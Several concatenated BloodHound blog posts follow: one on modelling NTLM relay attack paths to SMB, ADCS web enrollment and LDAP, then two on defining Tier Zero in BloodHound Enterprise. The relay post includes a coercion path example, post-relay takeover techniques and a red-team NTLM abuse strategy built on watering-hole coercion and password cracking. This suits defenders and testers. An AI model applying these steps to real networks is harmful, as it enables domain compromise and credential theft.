If the domain functional level is Windows Server 2012 R2 or higher, the relay victim must not be a member of the Protected Users group.
The edge is always created from Authenticated Users to the computer node representing the relay target.
Expanding the Coercion Targets accordion lists the relay victims, and expanding the Composition view shows a visual representation.
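For illustration, the edge-creation criteria can be sketched as a small function. The names and data shapes are invented for this example, it deliberately omits the Protected Users check, and the default for missing NTLM-restriction data shown here matches BloodHound Community Edition's behavior (Enterprise would instead skip the edge).

```python
def coerce_relay_smb_victims(target_signing_collected: bool,
                             target_requires_signing: bool,
                             victims_with_admin: list,
                             victim_ntlm_restricted: dict) -> list:
    """Sketch of the CoerceAndRelayNTLMToSMB criteria: returns the
    computer accounts that qualify as relay victims for a given target.
    An empty result means no edge is created."""
    # No edge without collected signing data, or if signing is required
    if not target_signing_collected or target_requires_signing:
        return []
    # Keep only computer accounts with local admin on the target and
    # no outgoing NTLM restriction (missing data -> assumed unrestricted)
    return [v for v in victims_with_admin
            if not victim_ntlm_restricted.get(v, False)]
```

If the returned list is non-empty, the edge runs from Authenticated Users to the relay target, and the victims appear in the Coercion Targets accordion.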
Abuse
An attacker can traverse this edge to gain access to the C$ or ADMIN$ share on the relay target, dump LSA secrets from Remote Registry, including the computer account password, or move laterally via the Service Control Manager.
A very common scenario captured by this new edge is the SCCM TAKEOVER-2 attack: coercing authentication from the SCCM site server and relaying it to the SCCM database server to take over the entire hierarchy.
SMB-Specific Limitations
The CoerceAndRelayNTLMToSMB edge only covers scenarios in which a computer (victim) has admin access to another computer (target) that does not require SMB signing. It doesn’t cover user accounts as the relay victim, and it doesn’t cover access to resources that a relay victim might be able to access via SMB without admin rights, such as non-administrative file shares.
Other limitations that apply to all new NTLM relay edges will be discussed later.
Targeting ADCS (ESC8)
The new CoerceAndRelayNTLMToADCS edge is much more complicated than relaying to SMB because certificate abuse has a lot of requirements. However, the relaying logic is still relatively simple. Relaying to ADCS web enrollment allows obtaining a certificate for the relay victim and using it for authentication to impersonate the victim. This is the infamous ADCS ESC8 that Will Schroeder and Lee Chagolla-Christensen disclosed in their Certified Pre-Owned white paper.
The ADCS Certificate Authority Web Enrollment endpoint and Certificate Enrollment Web Service run on IIS. IIS does not support session security, but it does support Extended Protection for Authentication (EPA), also known as channel binding. EPA is supported over HTTPS, but not HTTP because HTTP has no secure channel to bind. So, if web enrollment is available over HTTP or over HTTPS with EPA disabled, then relay is viable. This is the default configuration on Windows Server 2022 and older, but no longer the default on Windows Server 2025. Note that it applies to any site served on IIS with NTLM authentication, not just ADCS web enrollment.
As mentioned, relaying is all about authentication. Once authenticated, the attacker can do whatever the relay victim is permitted to do. This attack is viable only if the relay victim is permitted to enroll a client authentication certificate (requires EKUs that allow performing Kerberos PKINIT authentication or Schannel authentication to LDAP) and the CA is trusted by the domain controller and added to the domain’s NTAuthCertificates. Jonas Bülow Knudsen explains these requirements in detail in this blog post.
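As a rough illustration of the template-side requirement, the EKU check can be sketched as follows. The OIDs come from the Certified Pre-Owned research; the function name is an assumption of this sketch, and a real check also covers manager approval, authorized signatures, and enrollment rights.

```python
# EKU OIDs that permit client (domain) authentication; an empty EKU
# list means no restrictions and also qualifies.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

def template_allows_domain_auth(ekus) -> bool:
    """True if a certificate template's EKUs permit authenticating to
    AD via Kerberos PKINIT or Schannel."""
    return not ekus or bool(AUTH_EKUS.intersection(ekus))
```

A template carrying only, say, Server Authentication would fail this check and be useless for impersonating the relay victim.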
Introducing the CoerceAndRelayNTLMToADCS Edge
The new CoerceAndRelayNTLMToADCS edge comes out of the Authenticated Users node and leads into the victim computer node, unlike CoerceAndRelayNTLMToSMB, which leads into the relay target computer node. The reason for the difference is that the attack compromises the relay victim rather than the relay target.
Collection
SharpHound collects all the required information as follows:
Connect to the ADCS enrollment endpoints and attempt to perform NTLM authentication with and without EPA to determine if it’s enabled, required, or disabled. This can be collected without admin access.
All the ADCS certificate enrollment requirements are collected via LDAP, as done for all existing ADCS edges. This can be collected without admin access.
Outgoing NTLM restriction is collected from the relay victim via WMI or Remote Registry, which requires admin rights.
Edge Creation
BloodHound creates the edge if the following criteria are met:
The relay victim is a computer permitted to enroll a certificate with a template that meets the requirements listed below. The relay victim must have the enroll permission on the enterprise CA and the certificate template.
The certificate template has (1) EKUs that enable PKINIT/Schannel authentication, (2) manager approval disabled, and (3) no authorized signatures required.
The enterprise CA is trusted for NT authentication, and its certificate chain is trusted by the domain controller.
The enterprise CA published the certificate template.
The enterprise CA that published the certificate has a web enrollment endpoint available over HTTP or HTTPS with EPA disabled.
There is no outgoing NTLM restriction on the victim host. In BloodHound Community Edition, if this data wasn’t collected/ingested, it will be assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption is not made, and the edge will not be created.
If the domain functional level is Windows Server 2012 R2 or higher, the relay victim must not be a member of the Protected Users group.
The edge is always created from Authenticated Users to the computer node representing the relay victim.
Expanding the composition view shows all the components involved, including the certificate template and enterprise CA to target.
Abuse
After enrolling a certificate, the attacker can perform PKINIT authentication as the computer account using Rubeus to obtain a Kerberos Ticket Granting Ticket (TGT) and even the NT hash for the computer account through the UnPAC the Hash attack. With these, the attacker can compromise the relay victim host via S4U2Self abuse or a silver ticket, or use the TGT or the NT hash to access any resource that the computer account is permitted to access.
If the CA is susceptible to relay attacks, all the computers that can enroll a suitable certificate are exposed. Note that the default “Machine” certificate template meets the above criteria and exposes all the computers in the domain.
ADCS-Specific Limitations
The CoerceAndRelayNTLMToADCS edge only covers scenarios in which a computer (victim) can enroll a domain authentication certificate via a certificate authority web enrollment endpoint (target) that is vulnerable to relay attacks. It doesn’t cover user accounts as the relay victim, and it does not cover certificate templates incompatible with domain authentication.
Other limitations that apply to all new NTLM relay edges will be discussed later.
Targeting LDAP or LDAPS
The new CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS edges are by far the most complicated to abuse. Unlike SMB and IIS, LDAP servers are implemented to require the capabilities negotiated with the client in the NTLM exchange, meaning that if the client negotiates session security with signing, the LDAP server will require all subsequent messages in the session to be signed with the session key.
Computer account authentication coercion can trigger authentication from the SMB client, but the SMB client always negotiates session security with signing in the NTLM Authenticate message, so SMB can’t be relayed to LDAP. The exception to this rule is clients that have NTLMv1 enabled because, in NTLMv1, the MIC can be dropped, and the Negotiate Sign flag can be reset.
But that’s not a dead end. Some authentication coercion primitives, including the Printer Bug and PetitPotam, accept WebDAV paths simply by adding the at sign followed by a port number to the hostname, e.g., “\\attackerhost@80\icons\url.icon”.
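A tiny helper illustrates the path format (the function name and defaults are invented for this sketch):

```python
def webdav_coercion_path(hostname: str, port: int = 80,
                         resource: str = "icons\\url.icon") -> str:
    """Build a UNC path accepted by Printer Bug / PetitPotam-style
    coercion primitives. The '@port' suffix makes Windows route the
    request through the Web Client (WebDAV) instead of SMB, and the
    hostname must be dot-less to land in the Intranet Zone."""
    return f"\\\\{hostname}@{port}\\{resource}"
```

For example, `webdav_coercion_path("attackerhost")` produces `\\attackerhost@80\icons\url.icon`, matching the example above.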
WebDAV is encapsulated in HTTP messages sent by the Web Client service, which doesn’t negotiate signing and is, therefore, compatible with relaying to LDAP. However, by default, the Web Client would only authenticate to targets in the Intranet Zone, as per the default Internet Settings.
Getting in the (Intranet) Zone
HTTP clients in Windows should call the MapUrlToZoneEx2 function to determine which zone a given URL belongs to. The function determines that a URL maps to the Intranet Zone based on the following rules:
Direct Mapping: URLs manually added to the Intranet Zone
The PlainHostName Rule (aka “The Dot Rule”): If the URL’s hostname does not contain any dots
Fixed Proxy List Bypass: Sites added to the fixed proxy bypass list
WPAD Proxy Script: URLs for which the proxy script returns “DIRECT”
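Of these rules, the one attackers typically rely on is the PlainHostName rule, which is trivial to model. This sketch ignores the other three rules entirely and is only meant to show why a dot-less hostname matters:

```python
from urllib.parse import urlparse

def maps_to_intranet_by_dot_rule(url: str) -> bool:
    """Apply only the PlainHostName ('dot') rule: a hostname with no
    dots is treated as Intranet Zone. Real zone mapping
    (MapUrlToZoneEx2) also consults manual zone entries, proxy bypass
    lists, and WPAD."""
    hostname = urlparse(url).hostname or ""
    return "." not in hostname
```

So `http://attacker01/share` would be treated as Intranet, while `http://attacker01.evil.com/share` would not.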
If you use the host’s “shortname” (the hostname portion of the FQDN, e.g., “hostname” in hostname.contoso.local) or NetBIOS name, the underlying name resolution mechanisms will still resolve the name to an IP address even though the URL is “dot-less”, because DNS automatically appends a suffix from the client’s DNS search list, which is typically configured via DHCP or GPO.
But how can we get DNS resolution for our attacker-controlled host?
Bring Your Own DNS Record
By default, Active Directory Integrated DNS allows all Authenticated Users to create DNS records via LDAP or Dynamic DNS (DDNS), as discussed in this blog post by Kevin Robertson, and can be done with his tools Powermad and Sharpmad.
WebDAV Is a Hit or Miss
Authentication coercion can trigger WebDAV traffic only if the Web Client service is installed on the host, which it is by default on Windows desktops but requires the Desktop Experience or the WebDAV Redirector feature on Windows servers. Even if it is installed, it also needs to be running, which is not the default on desktops. Most user account authentication coercion primitives will automagically trigger the Web Client service to start. However, computer accounts are trickier: while most computer account authentication coercion primitives support WebDAV paths, they will not start the Web Client service. Therefore, when we target computer accounts, which is what we do here, we are limited to computers that already have the Web Client service running.
When the Web Client service starts, it opens a named pipe called DAV RPC SERVICE, so we can determine whether it is running remotely without admin rights.
One important thing to note is that when the Web Client service runs, it affects all processes running on the host in any context, not just the user who started it. Therefore, if we trigger the service to start via user account authentication coercion, for example, by dropping an authentication coercion file into a high-traffic shared folder, any user that browses the share potentially exposes the host they logged in on to NTLM relay to LDAP.
LDAP Relay Mitigations
LDAP servers support mitigating relay attacks with LDAP signing and LDAP channel binding. Each can be configured individually, and both must be enforced to prevent relay attacks. If either one isn’t, there is a bypass:
If LDAP signing is required and LDAP channel binding is disabled, the attacker can relay to LDAPS instead of LDAP, and because LDAPS encapsulates the traffic in a TLS channel, the domain controller considers the signing requirement to be met.
If LDAP channel binding is enforced and LDAP signing is disabled, the attacker can relay to LDAP with StartTLS, as discussed in this blog post, because the TLS channel is established only post-authentication.
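The resulting decision matrix is small enough to express as a sketch (names invented; a real implementation would also account for StartTLS availability and per-DC differences):

```python
from typing import Optional

def ldap_relay_route(signing_required: bool,
                     channel_binding_required: bool) -> Optional[str]:
    """Distill the bypass matrix: both enforcement settings must be on
    to block relay; either one alone leaves a route open."""
    if signing_required and channel_binding_required:
        return None                   # fully mitigated
    if signing_required:
        return "LDAPS"                # TLS satisfies the signing requirement
    if channel_binding_required:
        return "LDAP (StartTLS)"      # TLS is established post-authentication
    return "LDAP"                     # neither enforced
```

Only the first case blocks the attack; every other combination leaves the domain controller relayable over some LDAP flavor.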
These settings are DC-level settings, not domain-level settings, meaning that you may find different domain controllers with different configurations in the same environment.
Up until Windows Server 2025, domain controllers did not enforce these by default, and given that most organizations have not yet changed both of these settings, at this time, most domain controllers out there are vulnerable to NTLM relay attacks. However, as of Windows Server 2025, domain controllers enforce encryption (sealing) via session security on LDAP SASL bind by default, and with that new configuration, relaying to LDAP or LDAPS is no longer viable. But at this time, domain controllers running on Windows Server 2025 are still few and far between.
Note that enabling LDAP client signing does not mitigate relay attacks, as we’re not abusing LDAP clients; we are abusing web clients.
Viability Criteria
All things considered, relaying to LDAP is viable under the following conditions.
For the relay target, there is at least one domain controller that either:
Is running Windows Server 2022 or older and does not require LDAP signing, or has LDAPS enabled without requiring channel binding.
Is running Windows Server 2025 with its default LDAP signing/sealing enforcement explicitly disabled.
For the relay victim, the computer must either have the Web Client installed and running or have NTLMv1 enabled.
I Successfully Relayed to LDAP. Now What?
As I reiterated several times, relaying gets you through the authentication step. What you can do with the session afterward depends on the permissions of the relay victim. A successful relay to LDAP would allow you to perform any action that the relay victim is permitted to perform in Active Directory, with one caveat — password change/reset must happen over an encrypted channel, so that action is possible only when relaying to LDAPS.
In this scenario, we coerce and relay a computer account to LDAP or LDAPS. In this case, it is very unlikely that the relay victim, a computer account, would have high privileges in the domain. However, computers are allowed to change some attributes of their own computer account, including:
msDS-AllowedToActOnBehalfOfOtherIdentity, which would allow taking over the host via Resource-Based Constrained Delegation (RBCD), as explained in detail in this post.
msDS-KeyCredentialLink, which would allow taking over the host via the Shadow Credentials attack, as explained in detail in this post. Note that a computer account is permitted to add a new value to the msDS-KeyCredentialLink attribute as a validated write, only if there isn’t an existing key credential already present. However, even if there is already a key credential present, the computer account is allowed to delete it and then add a new one, which would require relaying twice: once for deletion and a second time for the Shadow Credentials attack.
Introducing the CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS Edges
The new CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS edges come out of the Authenticated Users node and lead into the victim computer node, just like the CoerceAndRelayNTLMToADCS edge, because here, too, the attack compromises the relay victim rather than the relay target.
Collection
SharpHound collects all the required information as follows:
Connect to the domain controllers via LDAP and LDAPS and attempt to perform NTLM authentication with and without signing and channel binding to determine if they’re enabled, required, or disabled. This can be collected without admin access.
Connect to the relay victim via SMB to check whether the DAV RPC SERVICE named pipe is open. This can be collected without admin access.
Outgoing NTLM restriction is collected from the relay victim via WMI or Remote Registry, which requires admin rights.
Edge Creation
BloodHound creates the CoerceAndRelayNTLMToLDAP edge if the following criteria are met:
There is at least one domain controller running on Windows Server 2022 or older that does not require LDAP signing.
The relay victim has the Web Client service running.
There is no outgoing NTLM restriction on the victim host. In BloodHound Community Edition, if this data wasn’t collected/ingested, it will be assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption is not made, and the edge will not be created.
BloodHound creates the CoerceAndRelayNTLMToLDAPS edge if the following criteria are met:
There is at least one domain controller running on Windows Server 2022 or older with LDAPS available and channel binding not required.
The relay victim has the Web Client service running.
There is no outgoing NTLM restriction on the victim host. In BloodHound Community Edition, if this data wasn’t collected/ingested, it will be assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption is not made, and the edge will not be created.
If the domain functional level is Windows Server 2012 R2 or higher, the relay victim must not be a member of the Protected Users group.
The edge is always created from Authenticated Users to the computer node representing the relay victim.
Expanding the Relay Targets section in the information panel lists all the affected domain controllers that can be targeted.
Abuse
As mentioned above, following a successful relay, the relay victim can configure RBCD or Shadow Credentials against its own computer account to compromise the host. In addition to that, if the computer account happens to have any abusable permissions in Active Directory, those will be viable as well, with the caveat that the ForcePasswordChange edge (password reset) is only abusable via LDAPS and not via LDAP.
In the real world, it is very common to find domain-joined workstations with the Web Client running, and domain controllers are very rarely configured to require both LDAP signing and channel binding or run on Windows Server 2025, so this is a very rel(a)yable way to compromise domain-joined hosts. It is even more common to abuse this technique for local privilege escalation on domain-joined workstations due to the ease of turning the Web Client service on and coercing authentication from SYSTEM as a low-privileged user.
LDAP-Specific Limitations
You may have noticed that BloodHound currently doesn’t take NTLMv1 into consideration for edge creation.
Another important limitation to note is that the CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS edges are created based on the current Web Client service status, but it is very dynamic. The fact that the service was not running on a host during collection does not mean it will remain that way and that the host is not exposed.
General Limitations
So far, we have mentioned some limitations affecting specific edge types. There are also limitations affecting all the new NTLM relay edges:
Only computer account authentication coercion scenarios are considered. User authentication coercion is out of scope at this time.
Only coercion scenarios are considered. Opportunistic relay attacks, i.e., waiting for a suitable relay victim to authenticate to an attacker-controlled host, such as authenticated vulnerability scanners, are out of scope.
Firewall and network restrictions are out of scope and not taken into consideration for these new relay edges, just as they were not taken into consideration for any of the previous BloodHound edges.
We also make a general assumption that computer account authentication coercion can be triggered by Authenticated Users, as explained earlier.
Future Work
We plan to introduce additional relay edges in the future. We already have relay to MS SQL and WinRM on our roadmap. We are always open to suggestions if you have additional ideas/requests.
NTLM Abuse Strategy
Let’s take everything covered in this post and put together an NTLM abuse strategy.
First, let’s make some observations and assumptions:
NTLM challenge-response capture is less noisy than NTLM relay, but cracking depends on the strength of the password.
User authentication coercion can trigger the Web Client service to start, but computer authentication coercion can’t.
Scanning for hosts with the Web Client service running can be noisy. Similarly, collecting session information is noisy or even impossible without local admin rights.
NTLM relay attacks should be precise on red team operations. The “Spray and Pray” approach should be avoided.
Given the above, I propose the following approach:
At the beginning of an op/assessment, cast a wide net for user authentication coercion through watering hole attacks on high-traffic file shares or web pages. Try to coerce and capture both WebDAV and SMB traffic if you can. SMB is sometimes more likely to succeed, but this is your opportunity to start the Web Client service on every affected client.
As you capture NTLM responses, keep track of where users authenticate from — it tells you where they have a session. It is, in a way, passive session collection.
Attempt to crack passwords of interesting accounts that can help you escalate privileges or achieve your objectives. Don’t waste your GPU on meaningless accounts.
If you identify an interesting user but can’t crack the password, it’s time to relay.
Target the computer on which the user was active and compromise it via relay to ADCS (ESC8) or via relay to LDAP/LDAPS (RBCD or Shadow Credentials).
Once you gain admin access to the host, you can potentially avoid the risk involved in lateral movement and credential abuse by placing an authentication coercion file on the user’s desktop via the C$ share and relaying the NTLM exchange to the target resource.
What is Microsoft Doing About It?
Microsoft has been making efforts to mitigate these attacks. As I mentioned, relaying to LDAP is no longer possible against domain controllers running Windows Server 2025, and all Windows 11 and Windows Server 2025 hosts now require SMB signing by default. It’s a good start.
Microsoft has been working on a much more significant initiative to deprecate NTLM altogether. They’ve identified the following reasons why Windows hosts still use NTLM and have started working on solutions:
Until recently, the only option for local account authentication was NTLM. Microsoft is in the process of rolling out a “local KDC” to support Kerberos authentication for local accounts.
When clients don’t have a line of sight to a domain controller, they can’t obtain Kerberos tickets and have to fall back to NTLM. Microsoft is in the process of rolling out IAKERB, which will turn every Windows host into a Kerberos proxy.
Kerberos authentication requires mapping the resource that the client is trying to access to a service account. This is done through service principal names (SPNs). SPNs usually use hostnames rather than IP addresses, so when a client attempts to access a resource by IP address, Kerberos authentication typically fails. However, as of Windows Server 2016, Windows supports SPNs with IP addresses.
Most NTLM usage is a result of software hard-coded to call the NTLM authentication package instead of the Negotiate package, which wraps Kerberos and NTLM and negotiates the most suitable option. Microsoft has been working on fixing these hard-coded issues in its own software, and, rumor has it, they have also been working with 3rd parties to fix their code.
Microsoft intends to have NTLM disabled by default (not completely removed), which means that even when the day finally comes, we will likely still find organizations that turn it back on, just as we still find hosts with NTLMv1 enabled. Last I heard, Microsoft had plans to have it done by 2028, but I believe they are already behind schedule, and, if history has taught us anything, we should expect it will take much longer than that.
Kerberos is NOT the Solution
For many years, people thought that Kerberos was not susceptible to relay attacks because it is based on tickets, and every ticket is issued to a specific service, so you can’t relay it to arbitrary targets. But that’s no longer the case. As James Forshaw discovered and Andrea Pierini weaponized, there are authentication coercion primitives that allow the attacker to control the service name for which the relay victim obtains a Kerberos ticket. These coercion primitives negotiate session security with signing, so they can’t be relayed to LDAP/LDAPS. However, they are compatible with relaying to SMB and ADCS.
Therefore, disabling NTLM is not the solution. Ensuring all servers enforce signing and channel binding is the right way to mitigate relay attacks.
We may add Kerberos relay edges to BloodHound in the future. Until then, you can be confident that whenever you see CoerceAndRelayNTLMToADCS or CoerceAndRelayNTLMToSMB edges, you can relay either NTLM or Kerberos.
Why Are We Releasing It Now?
There are many misconceptions about both the NTLM relay problem and its solutions. The new edges we introduced into BloodHound will hopefully bring clarity and put the issue in the spotlight, helping organizations prioritize one of the most significant yet underestimated risks affecting Active Directory environments.
Better Remediation Strategies
The remediation guidance for NTLM relay attacks is often “enforce everything, everywhere”, which is not very practical in a large environment that requires backward compatibility. However, BloodHound now helps defenders see what’s actually viable in their environments and prioritize high-impact/exposure targets. BloodHound has a set of pre-built cypher queries that can get you started with that.
Conclusion
NTLM relay attacks are far from dead. In fact, they’re often easier to execute and more effective than many security practitioners realize. This old technique remains one of the paths of least resistance in modern Active Directory environments, routinely enabling trivial pivots to high-value targets. The introduction of NTLM relay edges in BloodHound has made identifying and visualizing these attack paths remarkably simple: with just a few clicks, an operator can see how Authenticated Users can relay their way from zero to hero. In other words, BloodHound now depicts, with clear, intuitive edges, what once required stitching together information from multiple tools, showing defenders the real risks they face while allowing attackers to, once again, think in graphs.
Getting Started with BHE — Part 2: Contextualizing Tier Zero
TL;DR
An accurately defined Tier Zero provides an accurate depiction of Attack Path Findings in your BHE tenant.
Different principals (groups, GPOs, OUs, etc.) have different implications when Tier Zero is defined — understanding these will help reduce confusion around why something is showing up as Tier Zero.
Welcome to round two of the Getting Started with BloodHound Enterprise series. Today’s focus will be on understanding and contextualizing Tier Zero and ensuring that we have an accurate depiction of the Attack Paths that exist in your BloodHound Enterprise (BHE) tenant.
I started the last blog with a problem statement meant to align our focus, and I’ll include another one today. In this case, that would look something like:
“Have we identified (and configured) Tier Zero in our environment so that we have an accurate depiction of the Attack Paths that are increasing risk in our environment?”
In order to make progress here, we need to define and understand what we mean by Tier Zero. You may have a unique definition for your organization, which may require some additional due diligence; however, our definition here at SpecterOps is:
“Tier Zero is a set of assets in control of enterprise identities and their security dependencies”
Where:
Control: A relationship that can contribute to compromising the controlled asset or impact its operability
Security dependency: A component whose security impacts another component’s security [1]
Out of the box, BHE comes with some default Tier Zero options [2] that will always be marked as a Tier Zero object for each domain collected, including:
The Domain head object
AdminSDHolder object
Built-in Administrator account
Domain Admins
Domain Controllers
Schema Admins
Enterprise Admins
Key Admins
Enterprise Key Admins
Administrators
Not listed here are:
Users and Computers that are members of these groups; however, they inherit Tier Zero classification from the groups they share the “MemberOf” relationship with:
T0 Inheritance via Group Membership
Organizational Units (OUs) and Containers that contain these Tier Zero objects, though they are assigned Tier Zero based on containing Tier Zero objects as indicated below:
T0 Inheritance via “Contains” Relationship
Group Policy Objects (GPOs) that apply to these objects, though these are automatically marked as Tier Zero objects when they apply to a separate Tier Zero object:
T0 Inheritance via “GPLink” Relationship
What is not included in the default definition are groups like Account Operators (among several others). In your domain(s), this group may or may not be empty, and it may or may not contain your helpdesk, which generally widens your Tier Zero unnecessarily. There are also accounts like the MSOL account, responsible for Azure synchronization; your Privileged Access Workstations (PAWs); password managers (which have the ability to change the password on Tier Zero principals); and so on. These often become evident after the first collection, when you may see a handful of principals that “shouldn’t be there” even though the underlying relationship is 100% valid (something you will generally recognize from the additional context you have as a member of your organization). These are your “custom” Tier Zero objects that didn’t get wrapped up in BHE’s initial default definition. We do, of course, have additional documentation for these [3,4,5,6,7,8,9,10].
These custom additions will need to be manually added to Tier Zero in one of a couple different ways:
Tagging Tier Zero from the Explore Page
The first is through the Explore page, where you can search for individual objects and add them by right-clicking the object and selecting “Add to Tier Zero.” Similarly, if you select the “Explore” option for a Finding on the Attack Paths page, that will take you to this same Explore page where you can similarly add the object to Tier Zero. See below:
Exploring an Attack Path Finding to Add the Principal to Tier Zero
Adding the Attack Path Finding Principal to Tier Zero via the Explore Page
Either of these methods is a bit piecemeal and not the fastest way to modify Tier Zero, but both are a good way to inspect and validate your Tier Zero additions during this process. Don’t fear, though: there’s a faster way to add objects to Tier Zero.
The second option is through the Group Management page, which takes you to an overview of your Tier Zero:
Add or Remove Members (from Tier Zero) on the Group Management Page
Specify Members for Bulk Add on the Group Management Page
With this option, you can specify several names to add to Tier Zero and do a bulk add of any principals. Be aware that the changes that will take place, as noted above, include:
Groups that are added will cause members (computers, groups, users) to be added to Tier Zero
If the principal being added to Tier Zero is in an OU that is non-Tier Zero, the OU will be added to Tier Zero
If the principal being added to Tier Zero has GPOs that apply to it that are non-Tier Zero, these will be marked as Tier Zero
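The three propagation behaviors above (membership, “Contains”, and “GPLink”) can be made concrete with a minimal Python sketch. The object names and the `propagate_tier_zero()` helper are purely illustrative; this is not BHE’s implementation or API.

```python
# Hypothetical sketch of the propagation rules above; object names and the
# propagate_tier_zero() helper are illustrative, not BHE's implementation.

def propagate_tier_zero(seed, members, contained_by, gpos_applied):
    """Expand a seed Tier Zero set via membership, Contains, and GPLink."""
    tier_zero = set(seed)
    frontier = list(seed)
    while frontier:
        obj = frontier.pop()
        # Members of a Tier Zero group, the OU/container holding a Tier Zero
        # object, and GPOs applying to it all become Tier Zero themselves.
        for nxt in (members.get(obj, [])
                    + contained_by.get(obj, [])
                    + gpos_applied.get(obj, [])):
            if nxt not in tier_zero:
                tier_zero.add(nxt)
                frontier.append(nxt)
    return tier_zero

# Toy domain: tagging one custom group pulls in its members, its OU, and a GPO.
members      = {"PAW-Admins": ["paw01$", "alice"]}
contained_by = {"PAW-Admins": ["OU=Tier0"], "paw01$": ["OU=Tier0"]}
gpos_applied = {"paw01$": ["GPO: PAW Hardening"]}

print(sorted(propagate_tier_zero({"PAW-Admins"}, members, contained_by, gpos_applied)))
```

In this toy run, tagging the single group pulls four additional objects into Tier Zero, which mirrors what you will see in the UI after a bulk add.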
An important note about either of these options: neither is necessarily the “right” or the “wrong” way, and both get you to the same end state. Generally, I find that the former (adding via “Explore”) is best suited to inspecting individual Findings on the Attack Paths page, as these may merit additional analysis before adding the object to Tier Zero. The “Group Management” page, on the other hand, is great when you have a series of objects you want to add and don’t need to inspect anything further before adding them to your Tier Zero definition. Basically, if you have a batch of updates you want to add at one time, “Group Management” is the way to go.
New Tier Zero additions will also cause new Findings to appear where non-Tier Zero principals have permissions against these newly-added Tier Zero principals. But this is good — this is what we’re looking for.
And that’s the next step — custom-tagged Tier Zero assets. When this is complete, you’ll have a clearer picture of what the Attack Paths and valid Findings actually are. In some cases, this may point to a couple of groups with very extensive permissions, or you might find a swath of misconfigurations that you did not realize existed buried deep in your AD structure.
What does this look like in practice? Here’s an example of what your BHE tenant might look like before you’ve added any context (red indicates an Attack Path Finding in BHE, for clarity):
Contextualizing Tier Zero — “Default” View
Here we have a “default” Tier Zero object (Domain Admins) and four Findings under the “Generic All” Attack Path. If we expand this out, to see full exposure, it might look like this (black lines depict relationships):
Contextualizing Tier Zero — Exposure View
Here we can see that there’s only one Tier Zero principal (Domain Admins), with four Attack Paths, but an exposure count of nine (count of non-Tier Zero principals). Again, this is after default collection with no additional contextualization except that we’re visualizing exposure in a simplified scenario.
But you might look at one of those and say, “Hey, Group: A is a Tier Zero object, too.” So we add it to Tier Zero and then we see the following:
Contextualizing Tier Zero — Defined Tier Zero View
Now we have two Tier Zero principals:
Domain Admins
Group: A
We also have eight Attack Paths:
Three Tier One principals with GenericAll over Domain Admins
Five Tier One principals with GenericWrite over Group: A
We would also see a slight change in Exposure because one of the nine principals that would previously contribute to our count has been added to Tier Zero. Exposure here has decreased to eight.
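The arithmetic above can be reproduced with a small sketch, where exposure is the count of non-Tier Zero principals that can reach Tier Zero through any chain of edges. The principal names and edges are invented to match the simplified scenario; this is not BHE’s actual exposure calculation.

```python
# Toy recreation of the exposure math above (not BHE's actual calculation).

def exposure(edges, tier_zero):
    """Count non-Tier Zero principals with any path into Tier Zero."""
    exposed = set(tier_zero)
    changed = True
    while changed:
        changed = False
        for src, dst in edges:
            if dst in exposed and src not in exposed:
                exposed.add(src)
                changed = True
    return len(exposed - set(tier_zero))

# Five principals with GenericWrite over Group: A, three with GenericAll over
# Domain Admins, and Group: A itself with GenericAll over Domain Admins.
edges = [(f"user{i}", "Group: A") for i in range(1, 6)] + \
        [(f"admin{i}", "Domain Admins") for i in range(1, 4)] + \
        [("Group: A", "Domain Admins")]

print(exposure(edges, {"Domain Admins"}))              # 9 before tagging Group: A
print(exposure(edges, {"Domain Admins", "Group: A"}))  # 8 after tagging Group: A
```

Adding Group: A to Tier Zero removes it from the exposure count, which is exactly the nine-to-eight change described above.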
Now we have a better picture of what the Findings are in our environment, which allows us to better understand what needs attention, what needs to be mitigated, and what’s potentially leading to unnecessary exposure to Tier Zero. This is because we’ve taken the time to define Tier Zero for our organization.
Contextualizing your Tier Zero definition is important because otherwise your Findings will not accurately represent tiering violations, which is one of the first things you need to be able to see within BHE. This is what the Attack Path page shows you, and part of the reason it can be so valuable for organizations is that it summarizes pathways that cause exposure risks to your critical assets.
Once we have all that figured out, we’ll run into either of the following outcomes with no change in exposure:
Larger Tier Zero definition, decrease in Findings
Larger Tier Zero definition, increase in Findings
Objectively speaking, neither of these is better or worse than the other based on the change in Findings. Either is better than the previous state of visibility because it represents a more accurate view of your domain and the true Attack Paths that require your attention.
If we don’t figure this out, nothing changes and when we open up BHE we’re going to see an inaccurate depiction of what we actually care about. Again, that’s pathways (Attack Paths) that cause exposure risks to your critical assets (Tier Zero).
Join me again next time for Part 3, where we’ll work on identifying sources of exposure using Cypher queries.
[10] — “Defining the Undefined: What is Tier Zero, Pt IV,” by Martin Christensen, Lee Chagolla-Christensen, and Jonas Bülow Knudsen: https://www.youtube.com/watch?v=lLpCPBJIFkQ
Getting Started with BHE — Part 1
Understanding Collection, Permissions, and Visibility of Your Environment
TL;DR
Attack Path visibility is dependent upon scope of collection; complete collection is dependent upon appropriate permissions.
Your collection strategy benefits from tiering just like your domain(s).
Introduction
Welcome to my series on Getting Started with BloodHound Enterprise! This series comes after several discussions with customers about internal requirements for starting collection; I wanted to provide something that reads more like a blog/conversation and is easy to digest. That said, this doesn’t mean it’s irrelevant to BloodHound Community Edition (BHCE) users; much of the information here is valuable for users on both the Enterprise and Community Edition sides. This series will focus on users who are interested in gaining maximum visibility of their environments, defining Tier Zero, and understanding how to identify potential sources of exposure.
So, if you’ve got your BloodHound Enterprise (BHE) tenant up and running and are asking yourself “What now? Where do I start when it comes to BHE?” this series will give you actionable next steps and useful context for maximizing your BHE tenant.
Active Directory — Collecting with SharpHound
It may be obvious, but the first two things that need to be addressed are Collection and Permissions. These are necessary because you can’t see anything without collection, and collection is ultimately contingent upon the permissions you’re willing to grant your collector, which in this discussion will be SharpHound (Active Directory). In other words, with greater permission comes greater visibility. Uncle Ben never said that to Peter Parker in Spider-Man, but he would have if they had been working on a SharpHound install.
More directly, talking about collection and permissions here will help address the following problem statement. If this resonates with you, you’re in the right place:
